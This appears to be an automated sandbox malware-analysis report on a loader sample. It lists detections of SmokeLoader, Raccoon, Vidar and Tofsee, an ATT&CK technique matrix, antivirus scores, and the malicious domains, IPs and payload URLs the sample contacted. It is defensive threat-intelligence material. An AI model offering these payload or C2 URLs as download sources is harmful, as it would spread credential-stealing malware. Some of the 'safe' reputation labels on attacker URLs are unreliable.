Source: Yara match | File source: 0000002E.00000002.636412165.0000000000402000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.582614206.0000000003702000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002E.00000002.652977998.0000000007300000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.502914721.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002B.00000002.595825107.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.504088961.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.503538300.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002B.00000003.594002288.0000000003702000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000002.639820143.0000000000252000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.509652789.00000000035F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000002.662009828.00000000066B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.504557008.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002F.00000002.661388707.0000000003292000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: dump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match | File source: 1.0.zmbGUZTICp.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.gdrgbdj.6515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.zmbGUZTICp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.1.gdrgbdj.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.gdrgbdj.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.zmbGUZTICp.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.zmbGUZTICp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.zmbGUZTICp.exe.6415a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.zmbGUZTICp.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.408517834.00000000005C1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.408471084.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.462828818.00000000020A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.392111314.0000000004151000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.462437704.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match | File source: 31.2.A7F0.exe.4d60e50.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.A7F0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.3.A7F0.exe.4e00000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.A7F0.exe.4d60e50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.3.A7F0.exe.4e00000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.A7F0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001F.00000002.640601105.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.662718681.0000000004D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000003.553585077.0000000004E00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: A7F0.exe PID: 2200, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match | File source: 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 2DB3.exe PID: 5640, type: MEMORYSTR
Yara detected Tofsee
Source: Yara match | File source: 11.3.309C.exe.660000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.tejjnepq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.3.tejjnepq.exe.650000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.svchost.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.tejjnepq.exe.ed0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.svchost.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.tejjnepq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.tejjnepq.exe.ed0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.309C.exe.630e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.tejjnepq.exe.630e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.309C.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.309C.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000018.00000003.484958252.0000000000650000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.487069234.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.639945191.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000003.465535302.0000000000660000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.488137960.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.483029167.0000000000630000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.487496290.0000000000630000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.482701616.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 309C.exe PID: 5132, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: tejjnepq.exe PID: 2320, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 4692, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\309C.exe | Code function: 11_2_004088AF CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,
Source: C:\Users\user\AppData\Local\Temp\309C.exe | Code function: 11_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts 1 | Native API 531 | DLL Side-Loading 1 | DLL Side-Loading 1 | Disable or Modify Tools 211 | OS Credential Dumping 1 | System Time Discovery 2 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 15 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution 1 | Valid Accounts 1 | Valid Accounts 1 | Deobfuscate/Decode Files or Information 11 | Input Capture 1 | Account Discovery 1 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Encrypted Channel 22 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Command and Scripting Interpreter 3 | Windows Service 14 | Access Token Manipulation 1 | Obfuscated Files or Information 3 | Security Account Manager | File and Directory Discovery 3 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Scheduled Task/Job 1 | Scheduled Task/Job 1 | Windows Service 14 | Software Packing 33 | NTDS | System Information Discovery 438 | Distributed Component Object Model | Input Capture 1 | Scheduled Transfer | Non-Application Layer Protocol 5 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Service Execution 3 | Network Logon Script | Process Injection 713 | Timestomp 1 | LSA Secrets | Security Software Discovery 661 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 36 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Scheduled Task/Job 1 | DLL Side-Loading 1 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | File Deletion 1 | DCSync | Virtualization/Sandbox Evasion 241 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Masquerading 131 | Proc Filesystem | Application Window Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Valid Accounts 1 | /etc/passwd and /etc/shadow | System Owner/User Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Modify Registry 1 | Network Sniffing | Remote System Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Access Token Manipulation 1 | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Virtualization/Sandbox Evasion 241 | Keylogging | Local Groups | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | | | Inhibit System Recovery
Compromise Hardware Supply Chain | Visual Basic | Scheduled Task | Scheduled Task | Process Injection 713 | GUI Input Capture | Domain Groups | Exploitation of Remote Services | Email Collection | Commonly Used Port | Proxy | | | Defacement
Trusted Relationship | Python | Hypervisor | Process Injection | Hidden Files and Directories 1 | Web Portal Capture | Cloud Groups | Attack PC via USB Connection | Local Email Collection | Standard Application Layer Protocol | Internal Proxy | | | Internal Defacement

                          Behavior Graph

                          [Behavior graph not reproduced in this text capture. Graph metadata: ID 553117, sample zmbGUZTICp.exe, start date 14/01/2022, architecture WINDOWS, score 100.]

                          Screenshots

                          [Screenshot thumbnails not reproduced in this text capture.]

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          Source | Detection | Scanner | Label
                          zmbGUZTICp.exe | 35% | Virustotal |
                          zmbGUZTICp.exe | 42% | ReversingLabs | Win32.Trojan.Casdet
                          zmbGUZTICp.exe | 100% | Joe Sandbox ML |

                          Dropped Files

                          Source | Detection | Scanner | Label
                          C:\Users\user\AppData\Local\Temp\3F71.exe | 100% | Avira | HEUR/AGEN.1211353
                          C:\Users\user\AppData\Local\Temp\239.exe | 100% | Joe Sandbox ML |
                          C:\Users\user\AppData\Local\Temp\2D04.exe | 100% | Joe Sandbox ML |
                          C:\Users\user\AppData\Local\Temp\309C.exe | 100% | Joe Sandbox ML |
                          C:\Users\user\AppData\Local\Temp\1E7F.exe | 100% | Joe Sandbox ML |
                          C:\Users\user\AppData\Local\Temp\2DB3.exe | 100% | Joe Sandbox ML |
                          C:\Users\user\AppData\Local\Temp\1D34.exe | 100% | Joe Sandbox ML |
                          C:\Users\user\AppData\Local\Temp\3F71.exe | 100% | Joe Sandbox ML |
                          C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleHandler.dll | 0% | Metadefender |
                          C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleHandler.dll | 0% | ReversingLabs |
                          C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleMarshal.dll | 0% | Metadefender |
                          C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleMarshal.dll | 0% | ReversingLabs |
                          C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dll | 3% | Metadefender |
                          C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dll | 0% | ReversingLabs |
                          C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy.dll | 0% | Metadefender |
                          C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy.dll | 0% | ReversingLabs |
                          C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy_InUse.dll | 0% | Metadefender |
                          C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy_InUse.dll | 0% | ReversingLabs |
                          C:\Users\user\AppData\LocalLow\sG8rM8v\breakpadinjector.dll | 0% | Metadefender |
                          C:\Users\user\AppData\LocalLow\sG8rM8v\breakpadinjector.dll | 0% | ReversingLabs |
                          C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dll | 0% | Metadefender |
                          C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dll | 0% | ReversingLabs |
                          C:\Users\user\AppData\LocalLow\sG8rM8v\ldap60.dll | 0% | Metadefender |
                          C:\Users\user\AppData\LocalLow\sG8rM8v\ldap60.dll | 2% | ReversingLabs |
                          C:\Users\user\AppData\LocalLow\sG8rM8v\ldif60.dll | 0% | Metadefender |
                          C:\Users\user\AppData\LocalLow\sG8rM8v\ldif60.dll | 0% | ReversingLabs |

                          Unpacked PE Files

                          Source | Detection | Scanner | Label
                          28.0.3F71.exe.fa0000.11.unpack | 100% | Avira | HEUR/AGEN.1211353
                          1.0.zmbGUZTICp.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1123244
                          28.0.3F71.exe.400000.12.unpack | 100% | Avira | HEUR/AGEN.1145065
                          28.0.3F71.exe.400000.8.unpack | 100% | Avira | HEUR/AGEN.1145065
                          13.2.3F71.exe.130000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
                          24.3.tejjnepq.exe.650000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
                          13.0.3F71.exe.130000.1.unpack | 100% | Avira | HEUR/AGEN.1211353
                          7.0.1E7F.exe.2080e50.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                          8.2.2DB3.exe.630e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
                          1.0.zmbGUZTICp.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                          6.0.gdrgbdj.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                          28.0.3F71.exe.fa0000.1.unpack | 100% | Avira | HEUR/AGEN.1211353
                          28.0.3F71.exe.400000.4.unpack | 100% | Avira | HEUR/AGEN.1145065
                          24.2.tejjnepq.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
                          28.0.3F71.exe.fa0000.3.unpack | 100% | Avira | HEUR/AGEN.1211353
                          28.0.3F71.exe.400000.10.unpack | 100% | Avira | HEUR/AGEN.1145065
                          7.2.1E7F.exe.2080e50.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                          11.2.309C.exe.630e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
                          28.0.3F71.exe.fa0000.9.unpack | 100% | Avira | HEUR/AGEN.1211353
                          0.2.zmbGUZTICp.exe.6415a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                          28.0.3F71.exe.fa0000.13.unpack | 100% | Avira | HEUR/AGEN.1211353
                          6.0.gdrgbdj.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                          1.1.zmbGUZTICp.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                          31.3.A7F0.exe.4d10000.2.unpack | 100% | Avira | TR/Crypt.EPACK.Gen2
                          6.1.gdrgbdj.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                          1.0.zmbGUZTICp.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1123244
                          8.2.2DB3.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                          8.3.2DB3.exe.650000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
                          27.2.svchost.exe.4d0000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
                          11.3.309C.exe.660000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
                          6.2.gdrgbdj.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                          1.0.zmbGUZTICp.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                          5.2.gdrgbdj.6515a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                          1.0.zmbGUZTICp.exe.400000.3.unpack | 100% | Avira | HEUR/AGEN.1123244
                          31.2.A7F0.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1127993
                          28.0.3F71.exe.fa0000.2.unpack | 100% | Avira | HEUR/AGEN.1211353
                          24.2.tejjnepq.exe.630e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
                          13.0.3F71.exe.130000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
                          6.0.gdrgbdj.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                          24.2.tejjnepq.exe.ed0000.2.unpack | 100% | Avira | BDS/Backdoor.Gen
                          7.0.1E7F.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                          7.2.1E7F.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                          7.0.1E7F.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                          28.0.3F71.exe.400000.6.unpack | 100% | Avira | HEUR/AGEN.1145065
                          7.0.1E7F.exe.2080e50.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                          28.0.3F71.exe.fa0000.7.unpack | 100% | Avira | HEUR/AGEN.1211353
                          11.2.309C.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
                          13.0.3F71.exe.130000.3.unpack | 100% | Avira | HEUR/AGEN.1211353
                          28.0.3F71.exe.fa0000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
                          1.0.zmbGUZTICp.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1123244
                          1.2.zmbGUZTICp.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                          13.0.3F71.exe.130000.2.unpack | 100% | Avira | HEUR/AGEN.1211353
                          1.0.zmbGUZTICp.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                          28.0.3F71.exe.fa0000.5.unpack | 100% | Avira | HEUR/AGEN.1211353
                          7.3.1E7F.exe.2090000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

                          Domains

                          No Antivirus matches

                          URLs

                          Source | Detection | Scanner | Label
                          http://185.163.45.70/capibar | 12% | Virustotal |
                          http://185.163.45.70/capibar | 100% | Avira URL Cloud | phishing
                          http://185.7.214.171:8080/6.php | 100% | URL Reputation | malware
                          http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/74acab80c259fbd3afe9b19dbd62861e1ddfe5b8 | 0% | Avira URL Cloud | safe
                          http://host-data-coin-11.com/ | 0% | URL Reputation | safe
                          http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/53d4f78085a60d100b5580840cacffadb56a356d | 0% | Avira URL Cloud | safe
                          http://185.163.204.24/r | 0% | Avira URL Cloud | safe
                          http://185.215.113.35/d2VxjasuwS/index.php | 0% | Avira URL Cloud | safe
                          http://data-host-coin-8.com/files/6961_1642089187_2359.exe | 100% | Avira URL Cloud | malware
                          http://185.163.204.24/a | 0% | Avira URL Cloud | safe
                          http://185.215.113.35/d2VxjasuwS/index.php?scr=1 | 0% | Avira URL Cloud | safe
                          http://185.163.204.24/ | 0% | Avira URL Cloud | safe
                          https://login.liUTF-8/p | 0% | Avira URL Cloud | safe
                          http://data-host-coin-8.com/game.exe | 0% | URL Reputation | safe
                          http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/74acab80c259fbd3afe9b19dbd62861e1ddfe5b8v | 0% | Avira URL Cloud | safe
                          http://data-host-coin-8.com/files/8474_1641976243_3082.exe | 100% | Avira URL Cloud | malware
                          http://Passport.NET/tb | 0% | Avira URL Cloud | safe
                          https://login.liUTF-16p | 0% | Avira URL Cloud | safe
                          https://login.live | 0% | Avira URL Cloud | safe
                          http://185.163.204.24/F | 0% | Avira URL Cloud | safe
                          https://api.ip.sb/ip | 0% | URL Reputation | safe
                          http://185.163.204.24/B | 0% | Avira URL Cloud | safe
                          http://unicupload.top/install5.exe | 100% | URL Reputation | phishing
                          https://login.live.c | 0% | Avira URL Cloud | safe
                          http://185.163.204.24/0 | 0% | Avira URL Cloud | safe
                          http://crl.ver) | 0% | Avira URL Cloud | safe
                          http://185.163.204.22/capibar | 100% | Avira URL Cloud | malware
                          http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/74acab80c259fbd3afe9b19dbd62861e1ddfe5b841 | 0% | Avira URL Cloud | safe
                          http://185.163.204.24/as | 0% | Avira URL Cloud | safe
                          https://185.163.204.22/capibar | 100% | Avira URL Cloud | malware
                          http://data-host-coin-8.com/files/7729_1642101604_1835.exe | 100% | Avira URL Cloud | malware
                          http://data-host-coin-8.com/files/9030_1641816409_7037.exe | 100% | Avira URL Cloud | malware
                          http://185.215.113.35/d2VxjasuwS/plugins/cred.dll | 100% | Avira URL Cloud | malware
                          https://logilive.c | 0% | Avira URL Cloud | safe
                          http://178.62.113.205/capibar | 0% | Avira URL Cloud | safe

                          Domains and IPs

                          Contacted Domains

                          Name | IP | Active | Malicious | Antivirus Detection | Reputation
                          unicupload.top | 54.38.220.85 | true | false | | high
                          host-data-coin-11.com | 8.209.70.0 | true | false | | high
                          patmushta.info | 94.142.143.116 | true | false | | high
                          cdn.discordapp.com | 162.159.135.233 | true | false | | high
                          microsoft-com.mail.protection.outlook.com | 40.93.207.0 | true | false | | high
                          goo.su | 104.21.38.221 | true | false | | high
                          transfer.sh | 144.76.136.153 | true | false | | high
                          a0621298.xsph.ru | 141.8.194.74 | true | false | | high
                          data-host-coin-8.com | 8.209.70.0 | true | false | | high

                                            Contacted URLs

                          Name | Malicious | Antivirus Detection | Reputation
                          http://a0621298.xsph.ru/7.exe | false | | high
                          http://185.7.214.171:8080/6.php | true | URL Reputation: malware | unknown
                          http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/74acab80c259fbd3afe9b19dbd62861e1ddfe5b8 | false | Avira URL Cloud: safe | unknown
                          http://host-data-coin-11.com/ | false | URL Reputation: safe | unknown
                          http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/53d4f78085a60d100b5580840cacffadb56a356d | false | Avira URL Cloud: safe | unknown
                          http://185.215.113.35/d2VxjasuwS/index.php | true | Avira URL Cloud: safe | unknown
                          http://data-host-coin-8.com/files/6961_1642089187_2359.exe | true | Avira URL Cloud: malware | unknown
                          http://185.215.113.35/d2VxjasuwS/index.php?scr=1 | true | Avira URL Cloud: safe | unknown
                          http://185.163.204.24/ | false | Avira URL Cloud: safe | unknown
                          http://data-host-coin-8.com/game.exe | false | URL Reputation: safe | unknown
                          http://data-host-coin-8.com/files/8474_1641976243_3082.exe | true | Avira URL Cloud: malware | unknown
                          http://unicupload.top/install5.exe | true | URL Reputation: phishing | unknown
                          http://185.163.204.22/capibar | true | Avira URL Cloud: malware | unknown
                          http://a0621298.xsph.ru/9.exe | false | | high
                          http://data-host-coin-8.com/files/7729_1642101604_1835.exe | true | Avira URL Cloud: malware | unknown
                          http://data-host-coin-8.com/files/9030_1641816409_7037.exe | true | Avira URL Cloud: malware | unknown
                          http://185.215.113.35/d2VxjasuwS/plugins/cred.dll | true | Avira URL Cloud: malware | unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://185.163.45.70/capibarA7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmptrue
                                                • 12%, Virustotal, Browse
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://support.google.com/chrome/answer/6258784A7F0.exe, 0000001F.00000002.663878088.0000000005215000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000003.589484212.0000000005201000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000003.589577547.0000000005215000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://account.live.com/inlinesignup.aspx?iww=1&id=80601y0svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://telegram.org/img/t_logo.pngA7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2004/09/policytsvchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngA7F0.exe, 0000001F.00000002.650359326.0000000002F2A000.00000004.00000020.sdmpfalse
                                                          high
                                                          https://support.google.com/chrome/?p=plugin_flashA7F0.exe, 0000001F.00000003.589484212.0000000005201000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000003.589577547.0000000005215000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://t.me/capibarA7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmpfalse
                                                              high
                                                              http://185.163.204.24/rA7F0.exe, 0000001F.00000002.663539364.00000000051D4000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.645547709.0000019DDF702000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/02/scAMsvchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://185.163.204.24/aA7F0.exe, 0000001F.00000002.663539364.00000000051D4000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629A7F0.exe, 0000001F.00000002.663949745.0000000005218000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://login.liUTF-8/psvchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000002.664193950.000000000522C000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000002.663949745.0000000005218000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      https://account.live.com/InlineSignup.aspx?isvchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/74acab80c259fbd3afe9b19dbd62861e1ddfe5b8vA7F0.exe, 0000001F.00000002.663447293.00000000051C0000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.msn.com/?ocid=iehpA7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80600:svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80603xBsvchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://Passport.NET/tbsvchost.exe, 0000001D.00000002.643514399.0000019DDEEAE000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.643865558.0000019DDEEBD000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.645547709.0000019DDF702000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
Name | Source | Malicious | Antivirus Detection | Reputation
